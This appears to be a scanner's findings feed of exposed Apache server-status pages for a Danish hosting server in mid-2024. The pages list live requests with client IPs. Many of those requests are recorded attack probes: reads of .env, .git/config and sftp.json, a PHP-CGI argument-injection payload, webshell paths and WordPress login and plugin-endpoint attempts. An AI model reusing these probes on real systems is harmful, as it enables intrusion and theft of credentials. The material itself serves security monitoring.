206.189.2.13webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 22-3524460/30/240_ 0.05000.00.030.11 206.189.2.13webhotel5.webhosting.dkGET /server HTTP/1.0 23-3524490/30/240_ 0.03000.00.010.12 206.189.2.13webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 24-3524510/30/240_ 0.03000.00.010.25 206.189.2.13webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 25-3524620/30/240_ 0.04000.00.010.13 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 26-3532400/29/239_ 0.04000.00.020.09 206.189.2.13webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 27-2-0/0/192. 0.07231800.00.000.09 216.24.216.236webhotel5.webhosting.dkGET /maRR.php/Clouds25$$/ HTTP/1.0 28-2-0/0/192. 0.08231800.00.000.08 216.24.216.236webhotel5.webhosting.dkGET /wp-content/plugins/bfiyvjs/ HTTP/1.0 29-2-0/0/192. 0.07231800.00.000.05 216.24.216.236webhotel5.webhosting.dkGET /wp-content/patior/ HTTP/1.0 30-3523830/34/219_ 0.04800.00.010.06 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 31-3523870/31/149_ 0.04000.00.020.07 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 32-3523900/30/149_ 0.055500.00.010.08 162.55.217.71webhotel5.webhosting.dkGET /_struktur/images/oplevelser/rekreation-1.jpg HTTP/1.0 33-3523910/30/149W 0.06000.00.021.50 206.189.2.13webhotel5.webhosting.dkGET /server-status HTTP/1.0 34-1-0/0/100. 0.08605600.00.000.05 4.245.190.15webhotel5.webhosting.dkGET /xp.php HTTP/1.0 35-1-0/0/100. 0.07605600.00.000.04 4.245.190.15webhotel5.webhosting.dkGET /wp-includes/certificates/about.php HTTP/1.0 36-1-0/0/100. 0.06605600.00.000.07 4.245.190.15webhotel5.webhosting.dkGET /post-new.php HTTP/1.0 37-1-0/0/99. 0.06605600.00.000.04 4.245.190.15webhotel5.webhosting.dkGET /wp-admin/network/class.api.php HTTP/1.0 38-1-0/0/100. 0.06605600.00.000.16 4.245.190.15webhotel5.webhosting.dkGET /cgi-bin/about.php HTTP/1.0 39-1-0/0/100. 0.08605600.00.000.04 4.245.190.15webhotel5.webhosting.dkGET /wp-content/plugins/fix/up.php HTTP/1.0 40-1-0/0/100. 0.07605600.00.000.09 4.245.190.15webhotel5.webhosting.dkGET /wp-content/index.php HTTP/1.0 41-1-0/0/100. 0.08605500.00.000.16 4.245.190.15webhotel5.webhosting.dkGET /wp-includes/css/wp-login.php HTTP/1.0 42-1-0/0/100. 0.06605600.00.000.04 4.245.190.15webhotel5.webhosting.dkGET /assets/images/1p.php HTTP/1.0 43-1-0/0/100. 0.06605600.00.000.04 4.245.190.15webhotel5.webhosting.dkGET /wp-comments-post.php HTTP/1.0 44-0-0/0/50. 0.08900600.00.000.01 62.146.234.138webhotel5.webhosting.dkGET /Site/ HTTP/1.0 45-0-0/0/50. 0.06899500.00.000.01 62.146.234.138webhotel5.webhosting.dkGET /wp-admin/maint/ HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde32fe6d2f9
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Thursday, 04-Jul-2024 09:39:17 CEST Restart Time: Thursday, 04-Jul-2024 06:05:04 CEST Parent Server Generation: 3 Server uptime: 3 hours 34 minutes 13 seconds Total accesses: 22185 - Total Traffic: 13.8 MB CPU Usage: u1.83 s.94 cu0 cs0 - .0216% CPU load 1.73 requests/sec - 1126 B/second - 652 B/request 1 requests currently being processed, 30 idle workers ____________W_________________..........._...................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-3335500/1/660_ 0.001210.00.000.28 165.227.84.14webhotel5.webhosting.dkGET /_all_dbs HTTP/1.0 1-3335520/1/663_ 0.01960.00.000.44 165.227.84.14webhotel5.webhosting.dkGET /?rest_route=/wp/v2/users/ HTTP/1.0 2-3335530/1/663_ 0.001010.00.000.46 165.227.84.14webhotel5.webhosting.dkGET /telescope/requests HTTP/1.0 3-3335630/1/659_ 0.00120.00.000.57 172.105.16.105webhotel5.webhosting.dkGET /server HTTP/1.0 4-3335800/1/661_ 0.00110.00.000.29 172.105.16.105webhotel5.webhosting.dkGET /about HTTP/1.0 5-3335830/1/659_ 0.00030.00.000.30 172.105.16.105webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 6-3335840/1/662_ 0.00010.00.000.40 172.105.16.105webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 7-3336030/0/711_ 0.061200.00.000.29 165.227.84.14webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 8-3336310/0/711_ 0.081000.00.001.06 165.227.84.14webhotel5.webhosting.dkGET /.env HTTP/1.0 9-3335980/1/659_ 0.00010.00.000.40 172.105.16.105webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 10-3336350/0/709_ 0.07950.00.000.36 94.130.137.53webhotel5.webhosting.dkGET / HTTP/1.0 11-3335990/0/658_ 0.061300.00.000.34 62.146.234.106webhotel5.webhosting.dkGET /wp-content/ALFA_DATA/alfacgiapi/ HTTP/1.0 12-3336000/0/656W 0.07000.00.000.47 172.105.16.105webhotel5.webhosting.dkGET /server-status HTTP/1.0 13-3336010/0/655_ 0.071300.00.000.51 62.146.234.141webhotel5.webhosting.dkGET /.well-known/pki-validation/ HTTP/1.0 14-3336040/0/609_ 0.071200.00.000.37 89.187.164.158webhotel5.webhosting.dkGET /404.php HTTP/1.0 15-3336050/0/606_ 0.071200.00.000.31 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 16-3336360/0/660_ 0.07900.00.000.28 165.227.84.14webhotel5.webhosting.dkGET /login.action HTTP/1.0 17-3336060/0/604_ 0.071240.00.000.30 165.227.84.14webhotel5.webhosting.dkGET / HTTP/1.0 18-3336070/0/601_ 0.071200.00.000.27 75.74.123.83webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 19-3336080/0/631_ 0.071200.00.000.34 165.227.84.14webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 20-3336090/0/608_ 0.081200.00.000.27 165.227.84.14webhotel5.webhosting.dkGET /about HTTP/1.0 21-3336100/0/558_ 0.061200.00.000.40 62.146.234.141webhotel5.webhosting.dkGET /wp-conflg.php?p= HTTP/1.0 22-3336480/0/658_ 0.07700.00.000.31 165.227.84.14webhotel5.webhosting.dkGET /.DS_Store HTTP/1.0 23-3336750/0/609_ 0.07300.00.000.41 165.227.84.14webhotel5.webhosting.dkGET /.git/config HTTP/1.0 24-3336790/0/559_ 0.07200.00.000.47 62.146.234.141webhotel5.webhosting.dkGET /1975.php?shell=1975 HTTP/1.0 25-3336800/0/509_ 0.07200.00.000.44 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 26-3336810/0/509_ 0.06100.00.000.21 165.227.84.14webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 27-3336820/0/507_ 0.07110.00.000.31 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 28-3336830/0/459_ 0.07110.00.000.33 165.227.84.14webhotel5.webhosting.dkGET /server HTTP/1.0 29-3336840/0/456_ 0.07100.00.000.39 165.227.84.14webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 30-3-0/0/454. 0.0591800.00.000.38 62.146.234.106webhotel5.webhosting.dkGET /wp-content/plugins/ HTTP/1.0 31-3-0/0/504. 0.061000.00.000.40 165.227.84.14webhotel5.webhosting.dkven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.0 32-3-0/0/350. 0.0591800.00.000.22 62.146.234.141webhotel5.webhosting.dkGET /about.php?p= HTTP/1.0 33-3-0/0/350. 0.0691700.00.000.17 62.146.234.141webhotel5.webhosting.dkGET /wp-login.php?action=register HTTP/1.0 34-3-0/0/350. 0.0691700.00.000.14 62.146.234.141webhotel5.webhosting.dkGET /1.php?apx=upx HTTP/1.0 35-3-0/0/300. 0.0691700.00.000.11 62.146.234.106webhotel5.webhosting.dkGET /wp-content/uploads/ HTTP/1.0 36-3-0/0/300. 0.081200.00.000.12 165.227.84.14webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 37-3-0/0/249. 0.0612910.00.000.09 165.227.84.14webhotel5.webhosting.dkGET /server-status HTTP/1.0 38-3-0/0/250. 0.082200.00.000.41 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 39-3-0/0/100. 0.0510210.00.000.03 51.222.253.16www.all2one.dkGET /robots.txt HTTP/1.0 40-3-0/0/50. 0.072000.00.000.02 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 41-3262890/49/49_ 0.061000.00.030.03 165.227.84.14webhotel5.webhosting.dkGET /config.json HTTP/1.0 42-3-0/0/50. 0.07300.00.000.01 81.19.232.105webhotel5.webhosting.dkext.php?u=https://gayporno.online/searches/jav%20doggy HTTP/1.0 43-3-0/0/50. 0.08700.00.000.02 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 44-3-0/0/50. 0.06200.00.000.01 185.211.59.87webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 45-3-0/0/50. 0.09280.00.000.01 172.105.16.105webhotel5.webhosting.dkGET / HTTP/1.0 46-3-0/0/50. 0.06160.00.000.02 172.105.16.105webhotel5.webhosting.dkGET / HTTP/1.0 47-3-0/0/50. 0.07100.00.000.01 172.105.16.105webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 48-3-0/0/50. 0.07000.00.000.02 172.105.16.105webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds require
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde31d9b0d40
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Tuesday, 02-Jul-2024 04:03:56 CEST Restart Time: Tuesday, 02-Jul-2024 04:00:05 CEST Parent Server Generation: 0 Server uptime: 3 minutes 51 seconds Total accesses: 323 - Total Traffic: 162 kB CPU Usage: u.14 s.02 cu0 cs0 - .0693% CPU load 1.4 requests/sec - 718 B/second - 513 B/request 1 requests currently being processed, 34 idle workers ________________W__________________............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-0214630/10/10_ 0.002200.00.000.00 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 1-0214640/11/11_ 0.00000.00.000.00 167.99.210.137webhotel5.webhosting.dkGET /server HTTP/1.0 2-0214650/10/10_ 0.005300.00.000.00 80.82.76.214webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 3-0214660/10/10_ 0.015330.00.010.01 81.19.232.105webhotel5.webhosting.dkHEAD / HTTP/1.0 4-0214670/10/10_ 0.004800.00.000.00 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 5-0214680/10/10_ 0.001900.00.000.00 141.98.11.166webhotel5.webhosting.dkGET /public/fileman/php/upload.php HTTP/1.0 6-0214690/10/10_ 0.004330.00.000.00 63.143.42.253webhotel5.webhosting.dkHEAD / HTTP/1.0 7-0214700/10/10_ 0.005300.00.000.00 81.19.232.105webhotel5.webhosting.dkGET /.well-known/apple-app-site-association HTTP/1.0 8-0214710/10/10_ 0.0140560.00.000.00 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 9-0214720/10/10_ 0.01000.00.000.00 167.99.210.137webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 10-0214730/10/10_ 0.001500.00.000.00 37.114.41.189webhotel5.webhosting.dkGET /.env HTTP/1.0 11-0214740/10/10_ 0.001500.00.040.04 37.114.41.189webhotel5.webhosting.dkGET /laravel/.env HTTP/1.0 12-0214750/10/10_ 0.011140.00.000.00 66.249.64.232webhotel5.webhosting.dkGET / HTTP/1.0 13-0214760/10/10_ 0.001500.00.000.00 37.114.41.189webhotel5.webhosting.dkGET /api/.env HTTP/1.0 14-0214770/10/10_ 0.01900.00.000.00 111.90.148.123webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 15-0214780/10/10_ 0.00000.00.000.00 167.99.210.137webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 16-0214790/9/9W 0.00000.00.000.00 167.99.210.137webhotel5.webhosting.dkGET /server-status HTTP/1.0 17-0214800/10/10_ 0.01030.00.000.00 167.99.210.137webhotel5.webhosting.dkGET / HTTP/1.0 18-0214810/10/10_ 0.01000.00.020.02 167.99.210.137webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 19-0214820/10/10_ 0.00000.00.000.00 167.99.210.137webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 20-0214940/9/9_ 0.004700.00.000.00 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 21-0215220/9/9_ 0.01010.00.000.00 167.99.210.137webhotel5.webhosting.dkGET /about HTTP/1.0 22-0215230/9/9_ 0.00000.00.000.00 167.99.210.137webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 23-0215470/8/8_ 0.003000.00.000.00 54.36.148.49webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 24-0215480/8/8_ 0.002430.00.000.00 147.185.132.51webhotel5.webhosting.dkGET / HTTP/1.0 25-0215490/8/8_ 0.003800.00.000.00 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 26-0215500/8/8_ 0.012930.00.000.00 205.210.31.198webhotel5.webhosting.dkGET / HTTP/1.0 27-0215690/8/8_ 0.01100.00.000.00 81.19.232.105webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 28-0215700/8/8_ 0.00100.00.000.00 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 29-0215710/8/8_ 0.024460.00.000.00 216.245.221.87webhotel5.webhosting.dkHEAD / HTTP/1.0 30-0215720/8/8_ 0.01040.00.000.00 167.99.210.137webhotel5.webhosting.dkGET / HTTP/1.0 31-0215730/8/8_ 0.00110.00.000.00 81.19.232.105webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 32-0215740/8/8_ 0.010440.00.000.00 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 33-0215750/8/8_ 0.012640.00.000.00 122.238.154.133webhotel5.webhosting.dkGET / HTTP/1.0 34-0215760/8/8_ 0.01130.00.000.00 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde305007b17
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Sunday, 30-Jun-2024 05:05:55 CEST Restart Time: Sunday, 30-Jun-2024 04:00:05 CEST Parent Server Generation: 1 Server uptime: 1 hour 5 minutes 50 seconds Total accesses: 4803 - Total Traffic: 1.6 MB CPU Usage: u.88 s.52 cu0 cs0 - .0354% CPU load 1.22 requests/sec - 433 B/second - 356 B/request 1 requests currently being processed, 30 idle workers __________W_________________...___.............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-1248060/36/151_ 0.04800.00.010.04 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 1-1248070/37/152_ 0.03400.00.010.06 173.205.81.73webhotel5.webhosting.dkPOST /wp-login.php HTTP/1.0 2-1248080/37/151_ 0.05000.00.010.04 142.93.143.8webhotel5.webhosting.dkGET /server HTTP/1.0 3-1248090/37/151_ 0.04100.00.020.05 128.199.182.55webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 4-1248100/37/150_ 0.03030.00.010.04 142.93.143.8webhotel5.webhosting.dkGET / HTTP/1.0 5-1248120/37/149_ 0.05000.00.010.04 128.199.182.55webhotel5.webhosting.dkGET /login.action HTTP/1.0 6-1248130/37/149_ 0.04010.00.010.04 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 7-1248140/37/149_ 0.04000.00.010.06 142.93.143.8webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 8-1248150/37/149_ 0.04000.00.010.04 142.93.143.8webhotel5.webhosting.dkGET /about HTTP/1.0 9-1248160/37/149_ 0.03000.00.010.04 142.93.143.8webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 10-1248170/36/148W 0.03000.00.010.05 142.93.143.8webhotel5.webhosting.dkGET /server-status HTTP/1.0 11-1248180/36/148_ 0.041600.00.020.06 40.77.167.46webhotel5.webhosting.dkst&publicationName=temp&issueName=Issue_3_2012&page=72 HTTP/1.0 12-1248200/36/147_ 0.041350.00.010.10 128.199.182.55webhotel5.webhosting.dkGET / HTTP/1.0 13-1248220/36/148_ 0.031000.00.020.05 81.19.232.105webhotel5.webhosting.dkPOST /wp-login.php HTTP/1.0 14-1248250/36/148_ 0.04500.00.010.04 128.199.182.55webhotel5.webhosting.dkGET /server HTTP/1.0 15-1248260/36/148_ 0.03500.00.010.04 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 16-1248450/36/148_ 0.04400.00.010.05 94.102.51.95webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 17-1248900/36/147_ 0.03300.00.010.04 81.19.232.105webhotel5.webhosting.dkPOST /wp-login.php HTTP/1.0 18-1248990/36/147_ 0.04000.00.010.05 142.93.143.8webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 19-1249010/36/147_ 0.05000.00.050.08 142.93.143.8webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 20-1249040/35/145_ 0.041500.00.030.06 195.15.215.225webhotel5.webhosting.dkPOST /wp-login.php HTTP/1.0 21-1249050/35/144_ 0.04610.00.010.05 128.199.182.55webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 22-1249060/35/135_ 0.03410.00.010.04 128.199.182.55webhotel5.webhosting.dkGET /about HTTP/1.0 23-1249070/35/135_ 0.04300.00.010.05 128.199.182.55webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 24-1248230/36/148_ 0.03800.00.020.05 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 25-1249080/35/135_ 0.03200.00.010.04 128.199.182.55webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 26-1249090/35/135_ 0.031130.00.010.05 128.199.182.55webhotel5.webhosting.dkGET /server-status HTTP/1.0 27-1249310/33/133_ 0.04000.00.010.04 142.93.143.8webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 28-0-0/0/100. 0.0743500.00.000.03 191.101.157.24webhotel5.webhosting.dkGET /wp-content/themes/rishi/ HTTP/1.0 29-0-0/0/100. 0.0643500.00.000.03 191.101.157.24webhotel5.webhosting.dkGET /wp-content/themes/sketch/ HTTP/1.0 30-0-0/0/100. 0.0743500.00.000.05 191.101.157.24webhotel5.webhosting.dkGET /wp-content/themes/thuoc-nam/ HTTP/1.0 31-1248050/43/108_ 0.05410.00.010.03 128.199.182.55webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 32-1248110/37/101_ 0.04030.00.010.03 142.93.143.8webhotel5.webhosting.dkGET / HTTP/1.0 33-1248240/36/98_ 0.05670.00.010.03 128.199.182.55webhotel5.webhosting.dkGET / HTTP/1.0 34-0-0/0/62. 0.0034800.00.000.02 191.101.157.24webhotel5.webhosting.dkGET /VintageWeb/home/inicio/ HTTP/1.0 35-0-0/0/12. 0.0034800.00.000.00 191.101.157.24webhotel5.webhosting.dkGET /es/traduccion-com-ar-2/ HTTP/1.0 36-0-0/0/12. 0.0134800.00.000.00 191.101.157.24webhotel5.webhosting.dkGET /plumbing-professionals/ HTTP/1.0 37-0-0/0/12. 0.0034800.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 38-0-0/0/12. 0.0134800.00.000.00 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3acaf263a
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Friday, 28-Jun-2024 06:10:54 CEST Restart Time: Friday, 28-Jun-2024 04:00:05 CEST Parent Server Generation: 2 Server uptime: 2 hours 10 minutes 48 seconds Total accesses: 9992 - Total Traffic: 5.5 MB CPU Usage: u.96 s.46 cu0 cs0 - .0181% CPU load 1.27 requests/sec - 735 B/second - 577 B/request 1 requests currently being processed, 30 idle workers _____________________.W_________................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-2269380/26/301_ 0.03000.00.010.13 64.226.78.121webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 1-2269230/26/317_ 0.033730.00.010.13 221.239.90.67webhotel5.webhosting.dkGET / HTTP/1.0 2-2269170/30/321_ 0.02010.00.010.10 64.226.78.121webhotel5.webhosting.dkGET /about HTTP/1.0 3-2269410/26/300_ 0.02000.00.010.12 64.226.78.121webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 4-2269240/26/317_ 0.043620.00.010.12 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 5-2269420/26/301_ 0.02000.00.010.11 64.226.78.121webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 6-2269190/26/317_ 0.034000.00.010.20 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 7-2269250/26/317_ 0.042460.00.010.13 205.210.31.78webhotel5.webhosting.dkGET / HTTP/1.0 8-2269450/25/300_ 0.033800.00.010.16 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 9-2269470/25/299_ 0.042900.00.010.11 81.19.232.105webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 10-2269530/25/300_ 0.032740.00.010.23 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 11-2269870/25/299_ 0.031700.00.010.36 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 12-2269160/30/273_ 0.04000.00.010.11 64.226.78.121webhotel5.webhosting.dkGET /server HTTP/1.0 13-2270130/25/300_ 0.031720.00.010.12 185.234.216.114webhotel5.webhosting.dkGET / HTTP/1.0 14-2270390/25/300_ 0.03152460.00.010.17 81.19.232.105webhotel5.webhosting.dkGET / HTTP/1.0 15-2270460/25/250_ 0.03900.00.010.18 45.154.98.222webhotel5.webhosting.dkGET /wp-ver.php HTTP/1.0 16-2276940/24/248_ 0.042700.00.010.15 101.34.244.228webhotel5.webhosting.dkGET /wp-login.php HTTP/1.0 17-2269260/26/267_ 0.041100.00.010.10 46.199.216.58webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 18-2269270/26/267_ 0.03900.00.010.12 216.244.66.228webhotel5.webhosting.dkudskiftning-doere-vinduer-dasnk-kvalitet-slangerup.jpg HTTP/1.0 19-2269180/27/268_ 0.03000.00.010.16 64.226.78.121webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 20-2269310/26/266_ 0.054560.00.010.14 69.171.249.112webhotel5.webhosting.dkGET / HTTP/1.0 21-1-0/0/225. 0.0774100.00.000.21 4.245.190.15webhotel5.webhosting.dkGET /wp-includes/pomo/ HTTP/1.0 22-2269200/26/217W 0.03000.00.010.23 64.226.78.121webhotel5.webhosting.dkGET /server-status HTTP/1.0 23-2269210/26/217_ 0.034000.00.010.08 81.19.232.105webhotel5.webhosting.dkGET /om/ HTTP/1.0 24-2269220/26/217_ 0.033900.00.010.18 81.19.232.105www.brandstation.infoGET /RDWeb/Pages/en-US/login.aspx HTTP/1.0 25-2269280/26/216_ 0.04600.00.010.21 80.82.78.133webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 26-2269290/26/217_ 0.02500.00.010.19 69.171.249.6webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 27-2269300/26/216_ 0.03500.00.010.07 69.171.249.113webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 28-2269320/26/216_ 0.03110.00.010.09 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 29-2269330/26/216_ 0.03030.00.010.07 64.226.78.121webhotel5.webhosting.dkGET / HTTP/1.0 30-2269340/26/202_ 0.04070.00.010.15 64.226.78.121webhotel5.webhosting.dkGET / HTTP/1.0 31-2269350/26/190_ 0.03000.00.010.12 64.226.78.121webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 32-1-0/0/165. 0.0164500.00.000.10 81.19.232.105www.brandstation.infoGET /RDWeb/Pages/en-US/login.aspx HTTP/1.0 33-1-0/0/165. 0.0064500.00.000.06 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 34-1-0/0/165. 0.0164500.00.000.17 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 35-1-0/0/115. 0.0164500.00.000.06 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 36-1-0/0/115. 0.0064500.00.000.04 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 37-1-0/0/115. 0.0064500.00.000.12 ::1webhotel5-64bit.webhosting.dkOPTIONS * 